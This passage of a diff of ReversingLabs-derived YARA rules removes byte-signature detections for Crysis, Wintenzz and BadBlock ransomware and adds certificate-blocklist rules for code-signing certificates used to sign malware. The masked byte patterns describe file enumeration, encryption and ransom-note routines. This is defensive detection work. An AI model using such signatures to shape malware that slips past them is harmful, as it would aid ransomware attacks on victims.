-            ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 89 45 ??
-            8B 45 ?? 50 8D 45 ?? 50 8B 45 ?? 83 C0 ?? E8 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 8B 45
-            ?? 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? 8B 45 ?? 83 C0 ?? 8B 55 ??
-            E8 ?? ?? ?? ?? 8B 45 ?? 50 8D 45 ?? 50 8B 45 ?? 83 C0 ?? E8 ?? ?? ?? ?? 50 6A ?? 6A
-            ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? 85 C0 74 ?? C7 45 ?? ?? ??
-            ?? ?? 8B 45 ?? 83 C0 ?? 8B 55 ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? E8 ?? ?? ?? ?? EB
-            ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 83 C0 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ??
-            ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 6A ?? 8B 45
-            ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 8D 50 ?? 8B 45 ?? 8B 4D ?? E8 ?? ??
-            ?? ?? C3
-        }
-		$find_files = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 33 DB 89 9D ?? ?? ?? ?? 89 5D ?? 8B D9 89 55 ?? 89
-            45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF
-            30 64 89 20 8B C3 E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ??
-            80 7C 02 ?? ?? 74 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45
-            ?? 80 38 ?? 75 ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ??
-            ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0 85 F6 0F 95 C0 EB ?? F7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? 77 ?? 83 3B ?? 74 ?? 8B C3 BA ?? ?? ?? ?? E8 ?? ?? ?? ??
-            FF 33 FF 75 ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF
-            B5 ?? ?? ?? ?? 8B C3 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ??
-            ?? ?? F7 D8 1B C0 F7 D8 84 C0 75 ?? 56 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TASK ANNA LIMITED" and ( pe.signatures [ i ] . serial == "00:ff:52:eb:01:1b:b7:48:fe:e7:51:53:cb:e1:e5:0d:d6" or pe.signatures [ i ] . serial == "ff:52:eb:01:1b:b7:48:fe:e7:51:53:cb:e1:e5:0d:d6" ) and 1647388800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Crysis : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_84A4A0D0657E217B176B455E2465Aee0 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Crysis ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "bba2bbf5-ff77-5ec4-ae7f-afae1b564fb7"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "1484a28d-ce7c-506f-8cbb-73ac541a0907"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Crysis.yara#L1-L108"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11784-L11802"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "3c9250206f94ac65c1fc24e83cf8cdd76d10066086ef1f34ec14791d237c0263"
+		logic_hash = "92f6e90bd21182bece68ac1651105f96a18c5b1497d30e0040a978e349341bdb"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Crysis"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$remote_connection_1 = {
-            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 6A ??
-            6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 6A ?? 6A ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? B9
-            ?? ?? ?? ?? 66 89 4D ?? 6A ?? FF 15 ?? ?? ?? ?? 66 89 45 ?? 8B 55 ?? 52 FF 15 ?? ??
-            ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 4D ?? 8B 51 ?? 8B 45 ?? 83 3C 82 ??
-            74 ?? 8B 4D ?? 0F BF 51 ?? 52 8B 45 ?? 8B 48 ?? 8B 55 ?? 8B 04 91 50 8D 4D ?? 51 E8
-            ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A
-            ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 50 8B 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 6A ??
-            6A ?? 8D 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? EB ?? E9 ?? ?? ?? ?? 8B 45 ?? 8B E5 5D C3
-        }
-		$enumerate_files = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 33 DB 81 7D ?? ?? ?? ?? ?? 56 57 89 5C 24 ??
-            0F 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 7D ??
-            57 8B F0 FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 6A ??
-            68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 8E ?? ?? ?? ?? 8D 44 24 ?? 50 56
-            FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 5D ?? 8D 4C 24 ?? 51 68
-            ?? ?? ?? ?? 57 6A ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 7E ?? F6 44 24
-            ?? ?? 74 ?? 66 83 7C 24 ?? ?? 74 ?? 53 8D 54 24 ?? 52 8B D6 8B CF FF 55 ?? 85 C0 7E
-            ?? 8B 45 ?? 8B 4D ?? 40 50 53 51 56 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 53 8D 54 24 ?? 52
-            8B D6 8B CF FF 55 ?? 85 C0 7E ?? FF 44 24 ?? 8B 4C 24 ?? 8D 44 24 ?? 50 51 FF 15 ??
-            ?? ?? ?? 85 C0 7F ?? 8B 54 24 ?? 52 FF 15 ?? ?? ?? ?? 8B 5C 24 ?? 56 6A ?? FF 15 ??
-            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 5F 5E 8B C3 5B 8B E5 5D C3
-        }
-		$enumerate_resources = {
-            FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
-            8D 55 ?? 52 8B 45 ?? 50 8D 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 4D ?? 3B 4D ?? 0F 83
-            ?? ?? ?? ?? 8B 55 ?? C1 E2 ?? 8B 45 ?? 83 7C 10 ?? ?? 75 ?? 8B 4D ?? 51 FF 15 ?? ??
-            ?? ?? 8B 55 ?? C1 E2 ?? 8B 4D ?? 8B 75 ?? 8B 54 16 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B
-            45 ?? 50 8B 4D ?? 51 8B 55 ?? C1 E2 ?? 8B 45 ?? 8B 4C 10 ?? 51 E8 ?? ?? ?? ?? 83 C4
-            ?? 8B 55 ?? C1 E2 ?? 8B 45 ?? 8B 4C 10 ?? 83 E1 ?? 74 ?? 8B 55 ?? 52 8B 45 ?? 50 8B
-            4D ?? 51 8B 55 ?? C1 E2 ?? 03 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8D
-            4D ?? 51 8B 55 ?? 52 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 8B 4D ?? 51 8D 55 ?? 52 8B 45 ??
-            50 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 4D ?? 83
-            C1 ?? 89 4D ?? 8B 55 ?? 3B 55 ?? 0F 83 ?? ?? ?? ?? 8B 45 ?? C1 E0 ?? 8B 4D ?? 83 7C
-            01 ?? ?? 75 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 55 ?? C1 E2 ?? 8B 4D ?? 8B 75 ?? 8B
-            54 16 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? C1 E2 ?? 8B 45
-            ?? 8B 4C 10 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C1 E2 ?? 8B 45 ?? 8B 4C 10 ?? 83
-            E1 ?? 74 ?? 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? C1 E2 ?? 03 55 ?? 52 E8 ??
-            ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ??
-            ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 5E 8B E5 5D C3
-        }
-		$encrypt_files = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 8B D8 33 C0 56 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 8B
-            45 ?? 6A ?? 50 8D 4D ?? 51 8D 77 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B
-            D3 83 E2 ?? 2B DA 83 EB ?? 83 C4 ?? 89 5D ?? 8B 1D ?? ?? ?? ?? 50 FF D3 89 45 ?? 83
-            F8 ?? 0F 84 ?? ?? ?? ?? 8B 4D ?? 51 FF D3 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? 81 C2
-            ?? ?? ?? ?? 81 FA ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 8B 45 ?? A8 ?? 74 ?? 83 E0 ?? 50 8B
-            45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 51
-            FF 15 ?? ?? ?? ?? 8B D8 89 5D ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 33 C0
-            33 C9 51 50 53 89 45 ?? 89 45 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ??
-            ?? 75 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 33 C9 51 8D 55 ?? 52 33 C0 50 51 53 FF 15 ??
-            ?? ?? ?? 8B 45 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
-            8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B 55 ?? 8B 45 ?? 6A ?? 8D 4D ?? 51 52 57 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
-            ?? 8B 4D ?? 85 C9 74 ?? 8B 45 ?? 85 C0 75 ?? 3B 4D ?? 73 ?? 8B D1 83 E2 ?? B8 ?? ??
-            ?? ?? 2B C2 89 45 ?? 57 03 C1 8D 8D ?? ?? ?? ?? 57 51 E8 ?? ?? ?? ?? 8B 4D ?? 03 4D
-            ?? 83 C4 ?? 6A ?? 8D 55 ?? 52 51 57 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B
-            45 ?? 03 45 ?? 39 45 ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 6A ?? 8D 4D ?? 51 52 57
-            50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? E9 ?? ?? ?? ?? 6A ?? 6A ?? 57 E8 ?? ?? ?? ?? 8B 45
-            ?? 83 C4 ?? C7 47 ?? ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 85 C0 74 ?? 8B 4D ?? 51 50 56
-            C7 47 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 03 F0 01 45 ?? 8B 55 ?? 6A ??
-            52 56 E8 ?? ?? ?? ?? 8B 45 ?? 6A ?? 50 83 C6 ?? 56 E8 ?? ?? ?? ?? 6A ?? 8D 4D ?? 51
-            83 C6 ?? 56 E8 ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 83 C6 ?? 56 E8 ?? ?? ?? ?? 8B 45 ?? 68
-            ?? ?? ?? ?? 50 83 C6 ?? 56 E8 ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 83 EE ?? 56 E8 ?? ?? ??
-            ?? 83 C4 ?? 6A ?? 8D 55 ?? 52 83 C6 ?? 2B F7 56 57 53 FF 15 ?? ?? ?? ?? 85 C0 74 ??
-            39 75 ?? 75 ?? 53 FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 83 7D
-            ?? ?? 7E ?? 8B 75 ?? 33 C9 51 8D 55 ?? 52 33 C0 50 51 56 FF 15 ?? ?? ?? ?? 56 FF 15
-            ?? ?? ?? ?? 8B 5D ?? 53 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 7E ?? 8B 45 ?? 8B 4D ?? 50 51
-            FF 15 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 5E 5B 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $enumerate_resources and $enumerate_files and $encrypt_files and $remote_connection_1 )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AATB ApS" and ( pe.signatures [ i ] . serial == "00:84:a4:a0:d0:65:7e:21:7b:17:6b:45:5e:24:65:ae:e0" or pe.signatures [ i ] . serial == "84:a4:a0:d0:65:7e:21:7b:17:6b:45:5e:24:65:ae:e0" ) and 1616457600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Ransomware_Wintenzz : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_B8F726508Cf1D7B7913Bf4Bbd1E5C19C : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Wintenzz ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6bf569e8-b050-51ef-a948-0eb294248d63"
-		date = "2021-11-02"
-		modified = "2021-11-02"
+		id = "eb441b57-0f28-5609-b987-157e1f026b0c"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.Wintenzz.yara#L1-L83"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11804-L11822"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ff4bdf2f6ee185b98d0014b3066806fe7e25ea94f46837948bc5262440bf8a56"
+		logic_hash = "ec05c7e41e309aff00ae819c63f5bdc8e4172c611779da345efd211e48c9efb1"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Wintenzz"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            48 8D 75 ?? 41 B8 ?? ?? ?? ?? 48 89 F1 31 D2 E8 ?? ?? ?? ?? 48 89 F9 48 89 F2 E8 ??
-            ?? ?? ?? 48 83 F8 ?? 0F 84 ?? ?? ?? ?? 48 89 C6 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ??
-            ?? ?? 0F 28 85 ?? ?? ?? ?? 0F 29 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 0F 11 00 0F 28 85 ?? ?? ??
-            ?? 0F 11 40 ?? 48 8B 8D ?? ?? ?? ?? 48 89 48 ?? 49 89 77 ?? 49 89 47 ?? 41 C7 47 ??
-            ?? ?? ?? ?? 49 8D 4F ?? 48 8D 55 ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 40 B6 ?? 31 C0
-            49 89 07 48 85 DB 75 ?? EB ?? E8 ?? ?? ?? ?? 48 C1 E0 ?? 49 89 47 ?? 49 C7 47 ?? ??
-            ?? ?? ?? B8 ?? ?? ?? ?? 31 F6 49 89 07 48 85 DB 74 ?? 48 01 DB 74 ?? 41 B8 ?? ?? ??
-            ?? 48 89 F9 48 89 DA E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 85 D2 74 ?? 41 B8 ?? ??
-            ?? ?? 4C 89 F1 E8 ?? ?? ?? ?? 40 84 F6 75 ?? 48 8B 8D ?? ?? ?? ?? 48 85 C9 74 ?? 48
-            8B 95 ?? ?? ?? ?? 48 85 D2 74 ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 F8 48 81 C4
-            ?? ?? ?? ?? 5B 5F 5E 41 5E 41 5F 5D C3 BA
-        }
-		$encrypt_files_p1 = {
-            4C 89 75 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D
-            05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 C7 45 ?? ?? ?? ?? ??
-            48 C7 45 ?? ?? ?? ?? ?? 48 89 7D ?? 48 C7 45 ?? ?? ?? ?? ?? 48 8D 4D ?? 48 8D 55 ??
-            E8 ?? ?? ?? ?? 0F 10 45 ?? 0F 29 45 ?? 48 8B 45 ?? 48 89 45 ?? 48 8D 4D ?? 48 8D 55
-            ?? E8 ?? ?? ?? ?? 48 85 DB 74 ?? BA ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 48 85 C0 75
-            ?? BA ?? ?? ?? ?? 48 89 D9 E8
-        }
-		$encrypt_files_p2 = {
-            86 97 ?? ?? ?? ?? C0 74 3C ?? ?? C1 E8 ?? 28 03 00 48 ?? C0 74 2F ?? ?? FA 03 75 ??
-            48 8D 0D ?? ?? ?? ?? 48 39 C8 0F 84 ?? ?? ?? ?? 0F B7 08 81 F1 ?? ?? ?? ?? 0F B6 40
-            ?? 83 F0 ?? 66 09 C8 0F 84 ?? ?? ?? ?? 48 8B 4D ?? 48 8B 55 ?? E8 ?? ?? ?? ?? 48 85
-            C0 74 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 85 C0 74 ?? 48 83 FA ?? 75 ?? 48 8D 0D ?? ?? ??
-            ?? 48 39 C8 0F 84 ?? ?? ?? ?? 81 38 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8B 4D ?? 48 8B
-            55 ?? E8 ?? ?? ?? ?? 48 85 C0 74 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 85 C0 74 ?? 48 83 FA
-            ?? 75 ?? 48 8D 0D ?? ?? ?? ?? 48 39 C8 0F 84 ?? ?? ?? ?? 0F B7 08 81 F1 ?? ?? ?? ??
-            0F B6 40 ?? 83 F0 ?? 66 09 C8 0F 84 ?? ?? ?? ?? 48 8B 4D ?? 48 8B 55 ?? E8 ?? ?? ??
-            ?? 48 85 C0 74 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 85 C0 74 ?? 48 83 FA ?? 75 ?? 48 8D 0D
-            ?? ?? ?? ?? 48 39 C8 0F 84 ?? ?? ?? ?? 0F B7 08 81 F1 ?? ?? ?? ?? 0F B6 40 ?? 83 F0
-            ?? 66 09 C8 0F 84 ?? ?? ?? ?? 48 8B 4D
-        }
-		$drop_ransom_note = {
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 85 D2 74 ?? 48 8B 8D ?? ??
-            ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 85 D2 74 ?? 48 8B 8D
-            ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 85 D2 74 ?? 48
-            8B 8D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 85 D2 74
-            ?? 48 8B 8D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 85
-            D2 74 ?? 48 8B 8D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ??
-            48 85 D2 74 ?? 48 8B 8D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ??
-            ?? ?? 48 85 D2 74 ?? 48 8B 8D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 40 84 F6
-            0F 85 ?? ?? ?? ?? 48 8B 55 ?? 48 85 D2 74 ?? 41 B8 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 48 8B 55 ?? 48 85 D2 74 ?? 41 B8 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 48 8B 55
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_* ) ) and ( $drop_ransom_note )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Merkuri LLC" and ( pe.signatures [ i ] . serial == "00:b8:f7:26:50:8c:f1:d7:b7:91:3b:f4:bb:d1:e5:c1:9c" or pe.signatures [ i ] . serial == "b8:f7:26:50:8c:f1:d7:b7:91:3b:f4:bb:d1:e5:c1:9c" ) and 1619568000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Badblock : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_6A241Ffe96A6349Df608D22C02942268 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects BadBlock ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a5afb7d6-4bc1-5465-a35d-fe40e7f11c3e"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "8a8decfe-c91a-562c-9376-462cab598373"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.BadBlock.yara#L1-L100"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11824-L11840"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "421e6a3772eeec6ef0cbb2427b7e044b450a2b2146cee2ca7d8c3a3a92918557"
+		logic_hash = "79db8be7ca3ed80eb1e3a9401e8fec2b83da8b95b16789ed0b59bb7f4639a94d"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "BadBlock"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files = {
-            55 8B EC 83 C4 ?? 53 56 57 33 DB 89 5D ?? 89 5D ?? 89 5D ?? 89 4D ?? 89 55 ?? 8B D8
-            8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 ?? 8B 45 ??
-            8B 40 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C3 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 55
-            ?? 8B 45 ?? 8B 40 ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45
-            ?? B2 ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D
-            45 ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ??
-            ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B D0 8B 45 ?? 85 C0 74 ?? 83 E8 ?? 8B 00 6A ?? 50 52
-            8B 45 ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 8B 45 ?? 50 68 ?? ?? ?? ?? 8B 45 ?? 50
-            E8 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20
-            6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 10 FF 12 89 45 ?? 89 55 ?? E9 ?? ??
-            ?? ?? 83 7D ?? ?? 75 ?? 81 7D ?? ?? ?? ?? ?? 73 ?? EB ?? 7D ?? 8B 45 ?? 89 45 ?? 8B
-            45 ?? 89 45 ?? EB ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B D8 8B C3
-            E8 ?? ?? ?? ?? 8B F0 8B D6 8B CB 8B 45 ?? 8B 38 FF 57 ?? 89 45 ?? 8B 45 ?? 8B 10 FF
-            12 52 50 8B 45 ?? E8 ?? ?? ?? ?? 3B 54 24 ?? 75 ?? 3B 04 24 5A 58 72 ?? EB ?? 5A 58
